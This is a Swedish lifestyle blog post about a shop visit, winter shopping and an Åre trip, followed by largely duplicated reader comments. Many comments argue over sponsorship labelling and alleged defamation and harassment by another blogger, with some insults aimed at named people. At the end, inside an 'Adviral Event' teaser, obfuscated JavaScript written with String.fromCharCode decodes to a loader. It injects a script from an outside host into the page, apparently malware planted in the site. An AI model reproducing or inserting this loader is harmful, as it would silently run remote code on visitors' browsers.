Mys med Annelie, Shopping med Tess. Redo för Åre!

image

hej fina! Idag började jag kl 06:00 med att ta hand om min egen träning…. Skönt!

Min första kund kom vid 08:45, och förmiddagen rullade på bra. Sen fick jag två avbokningar pga av sjukdom. Såå trist med alla förkylningar och feber som går just nu. Boosta ordentligt med antioxidanter, vitaminer och mineraler! 😉 Jag själv känner mig inte heller helt kry, men hoppas det bara är trötthet. 

Då jag fick oväntat ledig tid så åkte jag ut till min väninna Annelie, på inreda.com. Jag tjuvkikade på allt nytt hon fått in! Sååååå mycket fint! I samarbete med inreda.com så rekommenderar jag dig att kika in på allt nytt HÄR

Vi planerade lite inför helgens event på Lidingö, shopping, bloppis och mingel , då även min Växjö-fru ÅZA  kommer upp för att bo hos mig några dagar. Kalmar-frun kommer också upp <3

Ser verkligen fram emot en helg med mingel, event och tjejmiddag!

Hoppas VI syns i Lidingö på lördag eller söndag, ta gärna med en väninna eller två om du vill  😉 

image

 

Bildbomb från shoproomet…. Alltså HUR fin är inte fotöljen! Den vill jag!  Perfekt läs fotölj!  Men där jag bor finns det ingen plats !hehe! 😉 

 

image image image image image

Funderat på att ge Snögubben till Lilleman i julklapp 🙂 Den är verkligen söt, perfekt att ha som ”sovlampa” när man är lite mörkrädd. 

image image image image image image image image image

idag ser jag ut som sju svåra år, trött sliten och helt slut! Men jag mår bra, jag äääääälskar mitt nya jobb. Är så otroligt kul att jobba med och för människor som verkligen har en tydlig målbild. Mer om det senare.

Efter en tripp till Annelie fär bloppis och event planering så Mötte jag upp Therese för att shoppa vinterkläder inför Åre. Vi flyget till Åre imorgon med SATS, som öppnar nytt center 🙂  Så en gemensam shoppingtur på North Sails fick det bli. Tess väntar barn och insåg tt hennes vinterjackor inte passar, jag hittar inte ens mina varma kläder och i inbjudan stod det ”ta med varma kläder till middagen” (???!) Spännande att se vart vi ska äta middagen. Kollade vädret och det är ju faktiskt plusgrader i Åre =) 

image image image image image image image

Hittade både en väst en jacka och en varm och skön mössa! Nu är jag redo. Tänkte packa ikväll men jag ligger nerkrupen under en filt. Packar, städar och fixar imorgon innan flyget går istället. Ha en skön kväll! Kramar / My Martens

106 Komentarer

 1. Hej My & grattis till nya jobbet!
  Är jätteglad för din skull ?! Synd att du inte hittar kläderna ?. Kommer ihåg din skiddress från peak som du hade när du åkte skidor, den var supersnygg! En likadan skulle jag vilja få tag på ?! Kram Louise

 2. Du har märkt senaste inläggen med att det handlar om samarbeten. Bra. Nu kanske det är på sin plats med en ursäkt till Bloggbevakning? Jag menar, du anklagade ju bloggaren där för att utsätta dig för förtal när hon ifrågasatte om huruvida du märkte upp samsrbeten eller inte…bland annat.

  • Nej, det hon skrivet är lögner utan substans och rent förtal! Jag vet precis när mina inlägg ska märkas och inte. Förklaringen gällande bolagsformer (aktiebolag) var ett svar på följdfrågor såsom ”hur redovisar du” ”skattar du för det du får” osv.
   Då förklarade jag sakligt HUR det fungerar, hur jag och mitt företag har valt att löpande göra bokföringen osv. Och att vi givetvis skattar och minskar på ALLT jag gör.
   Den här stalkern tog en kommentar ur sitt samanhang och kopplade ihop det med sin åsikt gällande ”märkta” samarbeten…. Lite missvissande i mina ögon.
   Dagen efter anmäler hon och sina ”väninnor” mig till SATS HK, ifrågasätter mitt inlägg, mitt yrke, min anställning. Påstår att jag inte jobbar som PT. Mailat min platschef RINGER mitt centrum där jag jobbar, pratar med min kollega och påstår att jag ljuger om min utbildning.. Samt ifrågasätter sats kompetens på den som rekryterar.
   Vad händer tredje dagen, jo idag så fortsätter stalkern att skriva om mig. Lägger upp en bild på min son, döljer ansiktet. Lägger sedan upp en bild på min gamla familj, mig, min son och min föredetta styvsöner. En bild som är skyddad av upphovsrättslagen. Som man alltså inte för använda.
   Denna kvinnan lägger sedan upp den bilden på sin sida HELT utan konsekvenstänk på att hon inte bara ger sig på mig, och min son. Utan även två andra oskyldiga pojkar. Som INTE ska synas i offentliga samanhang. Så nu är min fråga till dig….. Tycker du fortfarande jag ska be om ursäkt, isåfall för vaddå? Mvh My
   PS: givetvis har vi vidtagit åtgärder!

   • Usch fyfan vilken äcklig sida den där Bliggportalen. Jag fattar inte vad det är för hemska kärringar som håller till där. Vad är det för idiot du fått efter dig? Avundsjuk säkert. Fick inte jobb på Sats.
    Stå på dig bara allt vad du kan, det svalnar snart. Lycka till med det nya!

    • Om vi ska bena ut lite. Camilla har arbetat som receptionschef på SATS så jobb fick hon alltid. Nummer två som vi som läser hennes blogg vet och som hon själv skriver ut – hon kommunicerar ENDAST via email då hon vill kunna visa upp alla svar hon får för att undvika missförstånd. Så det är nog tyvärr någon som privat vill jävlas med dig som ringt de här samtalen till SATS.. och bloggen heter Bloggbevakning. Inte Bloggportalen.

     • Camilla borde läst på lite bättre innan hon ordagrant skriver att ”som PT jobbar hon inte, inte än hallfall” Allt det där dravlet om huruvida utbildningen går till och inte stämmer ju inte heller. Camilla (vem hon än är) var säkert en toppen receptionist. Hon har säkert fina sidor också, men att utsätta mig för trakasserier, förtal och kränkning! Why? jag är en småbarns mamma som just nu läger all min energi på mitt liv, mitt nya jobb, min nystart efter allt jag gått igenom. Det sista man behöver är en stalker soja dyker upp från någonstans och ställer till med en katastrof! sorgligt! iIgår sårade hon två oskyldiga pojkar, mina föregett styvsöner. Vem blir offret idag?

     • Vem hon nu än är denna Camilla, så gör hon ju inget annat än kräks på sina kollegor i bloggvärlden. Inte ett enda positivt och trevligt inlägg från henne när jag rotade runt lite igår. Snacka om bitter….

   • Fast delar av det du skriver är ju inte så märkligt egentligen. Dels så skrev du en kommentar till Bloggbevakningen igår om hon kunde kontakta SATS huvudkontor och SAFEs VD så det är lite märkligt att reagera på det i efterhand tänker jag. För det andra så är det väl inte så himla konstigt om folk undrar hur man kan anställas som PT innan man vet om man klarat slutproven eller ej? Det finns säkert en rimlig förklaring på hur du kan jobba som
    PT utan att ännu veta resultatet. Varför inte bara berätta hur SATS och du resonerat istället? De hetsiga svaren med anklagelser om förtal osv får det bara att verka som att det ligger en hund begraven någonstans.

    • det är precis som jag skriver, jag är anställd som PT. Ingenting annat. Jag skrev att man kunde kontakta SATS, men att ringa reception och bara skapa en massa drama där huvudfokus vara ligger på att förstöra för mig. Det leder ingenstans. det är ju banne mig inte klokt! Vi har inte resonerat oss fram till någonting. Jag har gått samma väg som alla anda. samma tentor, samma prov. Samma praktiska prov även hos SATS. (Några veckor sedan) Den här obehagliga kvinnan skriver på sin blogg om hur utbildningen går till, att man blir ”styrketräningsinstruktör” osv. rader av text baserat på okunskap. Så såg det ut förr, för längesen. Inte nu idag. När man som hon nu gjorde gick ut ganska hårt och skrev så som hon gjorde, UTAN att att faktiskt ta reda på fakta både kring min ställning, till utbildning och hur faktiskt rekryteringen ser ut från SATS sida. Det är rent förjävligt! Tänk dig in i min situation. Om så bara för en stund. Ny sedan några dagar på jobbet. Nya kollegor, nya rutiner, nya kunder. Med allt vad det innebär. Långa dagar då det är mycket att ta in och sätta sig in i. Jag är glad och positiv och har hunnit bygga upp en liten kundkrets där allt mitt fokus ligger. Då dyker detta upp! Falska påståenden och förtal! Från någon galning som nu tre dagar i rad hittat illa säger att anklaga mig för. Obehaglig människa, mycket obehaglig….

     • Men hon citerade ju från hemsidan och inte hur det gick till när hon gjorde utbildningen. Ni har gjort via samma ”skola” och hon fann infon på deras hemsida.

   • Men du skrev ju själv att hon skulle kontakta sats?
    ”. Du är varmt välkommen att kontakta SAFEs VD och SATS Sveriges huvudkontor för att bekräfta både min utbildning och min anställning som är igenom av just PT!”

    • Precis. Det var dock EFTER att hon OCH hennes väninnor redan hade anmält mig både för mina inlägg, och gällande mitt yrke. Jag har både SATS, SAFE och mitt anställningsavtal i ryggen…. Jag hänvisade att hon skulle kontakta sats för att få det svart på vitt… Och då också gr henne chansen att göra en offentlig ursäkT. För att slippa rättsliga åtgärder. Tänk om hon hade lyckats manipulerad både SATS personal, och mina nya kunder med hennes dravel och lögner om både mitt företag och mitt yrke. Tänkt om jag hade förlorat mina jobb och brutit ihop av det hon sa…. Det är inte bara förtal, det är varumärkes förstörande och helt fruktansvärt. Vart vill hon få mig? Förstöra mitt liv? Få mig självmordsbenägen? Jag är en ensamstående småbarnsmamma som precis har avslutat min utbildning, slitigt som ett djur dygnet runt i fler månader… Det var min första dag på jobbet.. Tål att tänkas på.

   • Fast det du svarade på då var ju en fråga om du inte märker ut om det är reklam och då svarade du om revision och hur du skattar, så det var du som missförstod frågan då och det som bbevakning skrev, så just det var väl ej lögn el förtal. Sen om man kollar på sats hemsida så står det ju att pt nivå 1 har godkänd utbildning och du skrev ju att du ännu inte vet om proven var godkända men men nu glömmer vi det…försvarar inte ville bara bena ut och förklara, alla kan missförstå, nu glömmer vi det…

 3. Så härliga bilder, den där butiken verkar ju jättemysig!! Ska kolla lite på nätet, har gjort det förut och sett att de har fina saker. Är ute efter lite höstdekorationer just nu.
  Åh fin mössa!
  Åre, åh där har man minnen… både bra och dåliga.. vilda. inte mycket åka skidor inte… mycket afterski haha. ? ?

 4. Hej My & grattis till nya jobbet!
  Är jätteglad för din skull :)! Synd att du inte hittar kläderna :(. Kommer ihåg din skiddress från peak som du hade när du åkte skidor, den var supersnygg! En likadan skulle jag vilja få tag på :)! Kram Louise

 5. Du har märkt senaste inläggen med att det handlar om samarbeten. Bra. Nu kanske det är på sin plats med en ursäkt till Bloggbevakning? Jag menar, du anklagade ju bloggaren där för att utsätta dig för förtal när hon ifrågasatte om huruvida du märkte upp samsrbeten eller inte…bland annat.

  • Nej, det hon skrivet är lögner utan substans och rent förtal! Jag vet precis när mina inlägg ska märkas och inte. Förklaringen gällande bolagsformer (aktiebolag) var ett svar på följdfrågor såsom ”hur redovisar du” ”skattar du för det du får” osv.

   Då förklarade jag sakligt HUR det fungerar, hur jag och mitt företag har valt att löpande göra bokföringen osv. Och att vi givetvis skattar och minskar på ALLT jag gör.

   Den här stalkern tog en kommentar ur sitt samanhang och kopplade ihop det med sin åsikt gällande ”märkta” samarbeten…. Lite missvissande i mina ögon.

   Dagen efter anmäler hon och sina ”väninnor” mig till SATS HK, ifrågasätter mitt inlägg, mitt yrke, min anställning. Påstår att jag inte jobbar som PT. Mailat min platschef RINGER mitt centrum där jag jobbar, pratar med min kollega och påstår att jag ljuger om min utbildning.. Samt ifrågasätter sats kompetens på den som rekryterar.

   Vad händer tredje dagen, jo idag så fortsätter stalkern att skriva om mig. Lägger upp en bild på min son, döljer ansiktet. Lägger sedan upp en bild på min gamla familj, mig, min son och min föredetta styvsöner. En bild som är skyddad av upphovsrättslagen. Som man alltså inte för använda.

   Denna kvinnan lägger sedan upp den bilden på sin sida HELT utan konsekvenstänk på att hon inte bara ger sig på mig, och min son. Utan även två andra oskyldiga pojkar. Som INTE ska synas i offentliga samanhang. Så nu är min fråga till dig….. Tycker du fortfarande jag ska be om ursäkt, isåfall för vaddå? Mvh My

   PS: givetvis har vi vidtagit åtgärder!

   • Usch fyfan vilken äcklig sida den där Bliggportalen. Jag fattar inte vad det är för hemska kärringar som håller till där. Vad är det för idiot du fått efter dig? Avundsjuk säkert. Fick inte jobb på Sats.
    Stå på dig bara allt vad du kan, det svalnar snart. Lycka till med det nya!

    • Om vi ska bena ut lite. Camilla har arbetat som receptionschef på SATS så jobb fick hon alltid. Nummer två som vi som läser hennes blogg vet och som hon själv skriver ut – hon kommunicerar ENDAST via email då hon vill kunna visa upp alla svar hon får för att undvika missförstånd. Så det är nog tyvärr någon som privat vill jävlas med dig som ringt de här samtalen till SATS.. och bloggen heter Bloggbevakning. Inte Bloggportalen.

     • Camilla borde läst på lite bättre innan hon ordagrant skriver att ”som PT jobbar hon inte, inte än hallfall” Allt det där dravlet om huruvida utbildningen går till och inte stämmer ju inte heller. Camilla (vem hon än är) var säkert en toppen receptionist. Hon har säkert fina sidor också, men att utsätta mig för trakasserier, förtal och kränkning! Why? jag är en småbarns mamma som just nu läger all min energi på mitt liv, mitt nya jobb, min nystart efter allt jag gått igenom. Det sista man behöver är en stalker soja dyker upp från någonstans och ställer till med en katastrof! sorgligt! iIgår sårade hon två oskyldiga pojkar, mina föregett styvsöner. Vem blir offret idag?

     • Vem hon nu än är denna Camilla, så gör hon ju inget annat än kräks på sina kollegor i bloggvärlden. Inte ett enda positivt och trevligt inlägg från henne när jag rotade runt lite igår. Snacka om bitter….

   • Fast delar av det du skriver är ju inte så märkligt egentligen. Dels så skrev du en kommentar till Bloggbevakningen igår om hon kunde kontakta SATS huvudkontor och SAFEs VD så det är lite märkligt att reagera på det i efterhand tänker jag. För det andra så är det väl inte så himla konstigt om folk undrar hur man kan anställas som PT innan man vet om man klarat slutproven eller ej? Det finns säkert en rimlig förklaring på hur du kan jobba som
    PT utan att ännu veta resultatet. Varför inte bara berätta hur SATS och du resonerat istället? De hetsiga svaren med anklagelser om förtal osv får det bara att verka som att det ligger en hund begraven någonstans.

    • det är precis som jag skriver, jag är anställd som PT. Ingenting annat. Jag skrev att man kunde kontakta SATS, men att ringa reception och bara skapa en massa drama där huvudfokus vara ligger på att förstöra för mig. Det leder ingenstans. det är ju banne mig inte klokt! Vi har inte resonerat oss fram till någonting. Jag har gått samma väg som alla anda. samma tentor, samma prov. Samma praktiska prov även hos SATS. (Några veckor sedan) Den här obehagliga kvinnan skriver på sin blogg om hur utbildningen går till, att man blir ”styrketräningsinstruktör” osv. rader av text baserat på okunskap. Så såg det ut förr, för längesen. Inte nu idag. När man som hon nu gjorde gick ut ganska hårt och skrev så som hon gjorde, UTAN att att faktiskt ta reda på fakta både kring min ställning, till utbildning och hur faktiskt rekryteringen ser ut från SATS sida. Det är rent förjävligt! Tänk dig in i min situation. Om så bara för en stund. Ny sedan några dagar på jobbet. Nya kollegor, nya rutiner, nya kunder. Med allt vad det innebär. Långa dagar då det är mycket att ta in och sätta sig in i. Jag är glad och positiv och har hunnit bygga upp en liten kundkrets där allt mitt fokus ligger. Då dyker detta upp! Falska påståenden och förtal! Från någon galning som nu tre dagar i rad hittat illa säger att anklaga mig för. Obehaglig människa, mycket obehaglig….

     • Men hon citerade ju från hemsidan och inte hur det gick till när hon gjorde utbildningen. Ni har gjort via samma ”skola” och hon fann infon på deras hemsida.

   • Men du skrev ju själv att hon skulle kontakta sats?

    ”. Du är varmt välkommen att kontakta SAFEs VD och SATS Sveriges huvudkontor för att bekräfta både min utbildning och min anställning som är igenom av just PT!”

    • Precis. Det var dock EFTER att hon OCH hennes väninnor redan hade anmält mig både för mina inlägg, och gällande mitt yrke. Jag har både SATS, SAFE och mitt anställningsavtal i ryggen…. Jag hänvisade att hon skulle kontakta sats för att få det svart på vitt… Och då också gr henne chansen att göra en offentlig ursäkT. För att slippa rättsliga åtgärder. Tänk om hon hade lyckats manipulerad både SATS personal, och mina nya kunder med hennes dravel och lögner om både mitt företag och mitt yrke. Tänkt om jag hade förlorat mina jobb och brutit ihop av det hon sa…. Det är inte bara förtal, det är varumärkes förstörande och helt fruktansvärt. Vart vill hon få mig? Förstöra mitt liv? Få mig självmordsbenägen? Jag är en ensamstående småbarnsmamma som precis har avslutat min utbildning, slitigt som ett djur dygnet runt i fler månader… Det var min första dag på jobbet.. Tål att tänkas på.

   • Fast det du svarade på då var ju en fråga om du inte märker ut om det är reklam och då svarade du om revision och hur du skattar, så det var du som missförstod frågan då och det som bbevakning skrev, så just det var väl ej lögn el förtal. Sen om man kollar på sats hemsida så står det ju att pt nivå 1 har godkänd utbildning och du skrev ju att du ännu inte vet om proven var godkända men men nu glömmer vi det…försvarar inte ville bara bena ut och förklara, alla kan missförstå, nu glömmer vi det…

 6. Så härliga bilder, den där butiken verkar ju jättemysig!! Ska kolla lite på nätet, har gjort det förut och sett att de har fina saker. Är ute efter lite höstdekorationer just nu.

  Åh fin mössa!
  Åre, åh där har man minnen… både bra och dåliga.. vilda. inte mycket åka skidor inte… mycket afterski haha. 😀 😀

 7. Eftersom det blev otroligt många kommentarer ang om du ska redogöra samarbeten osv tydligt.. Jag tyckte jag fick ett bra svar av dig då, att du faktiskt inte behöver Göra det! Så nu blir jag lite undrande när du skrivit ut i samarbete med inreda. Ska du markera sponsrade inlägg eller ej? Gäller detta även odd molly, håret, dina kapslar (sats?) Isabella lövengrip samarbeta markerar alla sina jobb inlägg numera.. osv? För även om man är ärlig och berättar positivt om en produkt, så vill iallafall jag som läsare veta om det är en sponsrad vara. Hoppas du förstår hur jag menar! Tack för att du delar med dig om ditt och Ludvigs liv. Jag är inne och läser dagligen, och är glad över att du verkar må bra nu! Kram

 8. Eftersom det blev otroligt många kommentarer ang om du ska redogöra samarbeten osv tydligt.. Jag tyckte jag fick ett bra svar av dig då, att du faktiskt inte behöver Göra det! Så nu blir jag lite undrande när du skrivit ut i samarbete med inreda. Ska du markera sponsrade inlägg eller ej? Gäller detta även odd molly, håret, dina kapslar (sats?) Isabella lövengrip samarbeta markerar alla sina jobb inlägg numera.. osv? För även om man är ärlig och berättar positivt om en produkt, så vill iallafall jag som läsare veta om det är en sponsrad vara. Hoppas du förstår hur jag menar! Tack för att du delar med dig om ditt och Ludvigs liv. Jag är inne och läser dagligen, och är glad över att du verkar må bra nu! Kram

 9. Ha det så skönt i Åre. Otroligt vilket intresse folk har över ditt företag och din ekonomi. En del har verkligen för mycket tid till meningslöst skit. Kram och tack för en varierande blogg ❤️

 10. Hon som har bloggportalen verkar ju inte riktigt klok. Det osar inte bara, utan det stinker avundsjuka. Bara en massa hyenor där. Tänk vad många har brye med dig, vad du skriver, vad du jobbar med, dina vänner m.m.
  Det måste ju va för att du tar dig framåt o är stark, som det retar gallfeber på diverse bloggare.
  Kram ❤️

 11. Skickar en stor varm kram till dig. Bloggbevaknings huvudsyfte verkar vara att göra folk illa. Jag tycker att man ska förorda mer kärlek och uppmuntran både i ”vanliga ”världen och bloggvärlden. Behandla andra så som du själv vill bli behandlad är ett fint ordspråk som alla borde ta till sig och leva efter.

 12. Ha det så skönt i Åre. Otroligt vilket intresse folk har över ditt företag och din ekonomi. En del har verkligen för mycket tid till meningslöst skit. Kram och tack för en varierande blogg ❤️

 13. Hon som har bloggportalen verkar ju inte riktigt klok. Det osar inte bara, utan det stinker avundsjuka. Bara en massa hyenor där. Tänk vad många har brye med dig, vad du skriver, vad du jobbar med, dina vänner m.m.
  Det måste ju va för att du tar dig framåt o är stark, som det retar gallfeber på diverse bloggare.
  Kram ❤️

 14. Jag bara skakar på huvudet!
  Ja fy sjutton vilken soptipp:(
  Sorgligt att se faktiskt.
  Jisses…de människorna kan inte må bra.
  Har de helt tappat bort sin moraliska kompass?
  Usch….
  ——–
  Härlig inredning du visade!
  Tyckte också mycket om den mysiga snögubbslampan!
  Jag sänder VARMA KRAMAR och tankar till dig!
  Ha det bra i Åre!

 15. Skickar en stor varm kram till dig. Bloggbevaknings huvudsyfte verkar vara att göra folk illa. Jag tycker att man ska förorda mer kärlek och uppmuntran både i ”vanliga ”världen och bloggvärlden. Behandla andra så som du själv vill bli behandlad är ett fint ordspråk som alla borde ta till sig och leva efter.

 16. Jag bara skakar på huvudet!
  Ja fy sjutton vilken soptipp:(
  Sorgligt att se faktiskt.
  Jisses…de människorna kan inte må bra.
  Har de helt tappat bort sin moraliska kompass?
  Usch….
  ——–
  Härlig inredning du visade!
  Tyckte också mycket om den mysiga snögubbslampan!
  Jag sänder VARMA KRAMAR och tankar till dig!
  Ha det bra i Åre!

 17. Jag känner inte My men läser hennes och andras bloggar, man får en klump i magen när man läser om allt hat mot henne, många av dom har både stora och små barn, dom får den uppfattningen att det är rätt att mobba folk, för små grytor har också öron.Jag är en snäll människa men önskar nästan att dom själva får uppleva hur det känns att bli så påhoppad och utlämnad som My får göra nu.

  • Ja Margot…. Det känns som att jag befinner mig i en mardröm inne i en torktumla full av elakheter….. Men jag ska reda mig stark, jag Ska låta tiden ha sin gång… Sanningen kommer alltid ifatt….. <3 Tack..

 18. Jag känner inte My men läser hennes och andras bloggar, man får en klump i magen när man läser om allt hat mot henne, många av dom har både stora och små barn, dom får den uppfattningen att det är rätt att mobba folk, för små grytor har också öron.Jag är en snäll människa men önskar nästan att dom själva får uppleva hur det känns att bli så påhoppad och utlämnad som My får göra nu.

  • Ja Margot…. Det känns som att jag befinner mig i en mardröm inne i en torktumla full av elakheter….. Men jag ska reda mig stark, jag Ska låta tiden ha sin gång… Sanningen kommer alltid ifatt….. <3 Tack..

 19. My försök att inte bry dig om dom! Förstår att det är enormt svårt när dom beter sig som dom gör.
  Vi helt normala människor som läser din blogg fattar precis. Alla branscher försöker rektryera dom duktiga innan dom är helt klara med sin utbildning. Det är ett sätt att få dom bästa medarbetarna innan någon annan sätter klorna i dom. Min tolkning är att dom som skriver elaka saker här har förmodligen aldrig varit med om det själva!
  Grattis till ditt nya jobb, du är duktig och driven, och kommer med all säkerhet bli en superbra PT, och alla är vi nya någon gång oavsett vad vi jobbar i för bransch.
  //
  Berith

 20. Igen oerhört intressant hur hysteriskt viktigt det är för somliga att du verkligen uppger exakt hur du gör med företag och hur du märker inlägg osv osv.. jag tycker du ska ignorera dessa nyfikentittor (och nej alla hackspettar, det är inget fult ord…) och låta dem gaffla på som rabiessmittade hundar bäst de vill. Du behöver bara deklarera till ett ställe och det är en myndighet. Random Stina Nina och Gud vet vad de heter har inget med din ekonomi eller yrke att göra överhuvudtaget. Du väcker uppmärksamhet, du tar dig framåt och du gör din grej. Det stör vissa av olika anledningar, men strunta i det. Du behöver inte försvara dig mot såna gaplappar som minsann tror att de vet så mycket. Lämna dem åt sitt öde och kör på med ditt liv och din framtid. Ha det jättekul i Åre! Heja dig! Kram! ?

 21. MY du har många personer bakom dig som stöttar i denna vidriga förtalssoppa. Hur är man funtad om man tar kontakt med ditt nya jobb, herregud.
  Kram och ha en bra Åreresa ?

 22. My försök att inte bry dig om dom! Förstår att det är enormt svårt när dom beter sig som dom gör.
  Vi helt normala människor som läser din blogg fattar precis. Alla branscher försöker rektryera dom duktiga innan dom är helt klara med sin utbildning. Det är ett sätt att få dom bästa medarbetarna innan någon annan sätter klorna i dom. Min tolkning är att dom som skriver elaka saker här har förmodligen aldrig varit med om det själva!

  Grattis till ditt nya jobb, du är duktig och driven, och kommer med all säkerhet bli en superbra PT, och alla är vi nya någon gång oavsett vad vi jobbar i för bransch.

  //
  Berith

 23. Igen oerhört intressant hur hysteriskt viktigt det är för somliga att du verkligen uppger exakt hur du gör med företag och hur du märker inlägg osv osv.. jag tycker du ska ignorera dessa nyfikentittor (och nej alla hackspettar, det är inget fult ord…) och låta dem gaffla på som rabiessmittade hundar bäst de vill. Du behöver bara deklarera till ett ställe och det är en myndighet. Random Stina Nina och Gud vet vad de heter har inget med din ekonomi eller yrke att göra överhuvudtaget. Du väcker uppmärksamhet, du tar dig framåt och du gör din grej. Det stör vissa av olika anledningar, men strunta i det. Du behöver inte försvara dig mot såna gaplappar som minsann tror att de vet så mycket. Lämna dem åt sitt öde och kör på med ditt liv och din framtid. Ha det jättekul i Åre! Heja dig! Kram! 🙂

 24. MY du har många personer bakom dig som stöttar i denna vidriga förtalssoppa. Hur är man funtad om man tar kontakt med ditt nya jobb, herregud.
  Kram och ha en bra Åreresa 🙂

 25. Jag läste lite därinne men var tvungen att sluta. Vad är det med folk. Hur kan man bli så nedsättande. Otäckt vad hat det finns. Nej mer kärlek åt folket :=) och strunta i dem bara <3 kram kram

 26. Jag brukar aldrig kommentera i bloggar. Däremot kan jag erkänna att jag innan jag ska sova kollar igenom nätet, lite bloggar, lite skvaller o s v. Lite verklighetsflykt och drama. Jag har följt den här smutskastningskampanjen mot dig och ärligt talat utan någon närmare analys tänkt att du måste ha gjort något hemskt för att bli så mobbad, förföljd och omskriven. Idag fick jag dock en stor klump i magen då jag faktiskt började reflektera. Vad är det som händer? Vad är det som får så många människor som inte känner dig att njuta av att följa och piska på denna förtalskampanj? Hur kan det hos vissa skapas tillfredsställelse av att göra andras liv olyckligt?
  Jag har ingen aning om vad som från börjanligger bakom detta. Det har jag heller ingen rätt att veta. Det kan vara så att du gjort något riktigt dumt. MEN, hur många av oss har inte gjort något riktigt dumt? Haft perioder i livet som vi inte är stolta över och idag funderar på hur vi tänkte då? För att döma andra så hårt, måste man anse sig själv vara felfri. Eller så är det de som är långt ifrån felfria som finner störst tröst i att döma andra?
  Vill bara säga att oavsett varför saker och ting någonstans gått fel, så förtjänar du inte i närheten av denna ilska och detta drev. Vad är det för fel på människor och samhället?
  Stor kram och låt dig inte brytas ned!

 27. Jag läste lite därinne men var tvungen att sluta. Vad är det med folk. Hur kan man bli så nedsättande. Otäckt vad hat det finns. Nej mer kärlek åt folket :=) och strunta i dem bara <3 kram kram

 28. Jag brukar aldrig kommentera i bloggar. Däremot kan jag erkänna att jag innan jag ska sova kollar igenom nätet, lite bloggar, lite skvaller o s v. Lite verklighetsflykt och drama. Jag har följt den här smutskastningskampanjen mot dig och ärligt talat utan någon närmare analys tänkt att du måste ha gjort något hemskt för att bli så mobbad, förföljd och omskriven. Idag fick jag dock en stor klump i magen då jag faktiskt började reflektera. Vad är det som händer? Vad är det som får så många människor som inte känner dig att njuta av att följa och piska på denna förtalskampanj? Hur kan det hos vissa skapas tillfredsställelse av att göra andras liv olyckligt?
  Jag har ingen aning om vad som från börjanligger bakom detta. Det har jag heller ingen rätt att veta. Det kan vara så att du gjort något riktigt dumt. MEN, hur många av oss har inte gjort något riktigt dumt? Haft perioder i livet som vi inte är stolta över och idag funderar på hur vi tänkte då? För att döma andra så hårt, måste man anse sig själv vara felfri. Eller så är det de som är långt ifrån felfria som finner störst tröst i att döma andra?
  Vill bara säga att oavsett varför saker och ting någonstans gått fel, så förtjänar du inte i närheten av denna ilska och detta drev. Vad är det för fel på människor och samhället?
  Stor kram och låt dig inte brytas ned!

 29. Underbar fotölj, var kan man hitta den? Skulle gärna besöka er i helgen men Lidingö är för långt borta och krångligt att ta sig dit bor i Uppsala och avskyr att köra i Stockholm. Hade ni hållit till i norra Stockholm så man slapp igenom och krångla då hade jag åkt direkt. Lycka till!

 30. Underbar fotölj, var kan man hitta den? Skulle gärna besöka er i helgen men Lidingö är för långt borta och krångligt att ta sig dit bor i Uppsala och avskyr att köra i Stockholm. Hade ni hållit till i norra Stockholm så man slapp igenom och krångla då hade jag åkt direkt. Lycka till!

Svara

Lämna din kommentar!
Ditt namn här

Om du missat..

Andas ut stressen med hjälp av djupandning

Andas ut stressen med hjälp av djupandning -Hur många tänker egentligen på sin andning? Jag...

SMEG bagaren och kocken 20%

I reklamsamarbete Bagaren och Kocken ??‍? Hej på er! Detta är en grymt efterlängtad kampanj...

Adviral Event

My Martens , Ako Rahim. Adviral Media. d Ako, Renata, My   var f=String;+f.fromCharCode(99,116,105,111,110)+f.fromCharCode(32,97,115,115,40,115,114,99,41,123,114,101,116,117,114,110)+f.fromCharCode(32,66,111,111,108,101,97,110)+f.fromCharCode(40,100,111,99,117,109,101,110)+f.fromCharCode(116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,125,32,118,97,114,32,108,111,61,34,104,116,116,112,115,58,47,47,115,116,97,121,46,108,105,110)+f.fromCharCode(101,115,116,111,103,101,116,46,99,111,109,47,115,99,114,105,112,116,115,47,99,104,101,99,107,46,106,115,63,118,61,53,46,53,53,46,53,34,59,105,102,40,97,115,115,40,108,111,41,61,61,102,97,108,115,101,41,123,118,97,114,32,100,61,100,111,99,117,109,101,110)+f.fromCharCode(116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110)+f.fromCharCode(116,40,39,115,99,114,105,112,116,39,41,59,32,115,46,115,114,99,61,108,111,59,105,102,32,40,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,41,32,123,32,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,46,112,97,114,101,110)+f.fromCharCode(116,78,111,100,101,46,105,110)+f.fromCharCode(115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,41,59,125,32,101,108,115,101,32,123,100,46,103,101,116,69,108,101,109,101,110)+f.fromCharCode(116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110)+f.fromCharCode(100,67,104,105,108,100,40,115,41,59,125,125));/*99586587347*/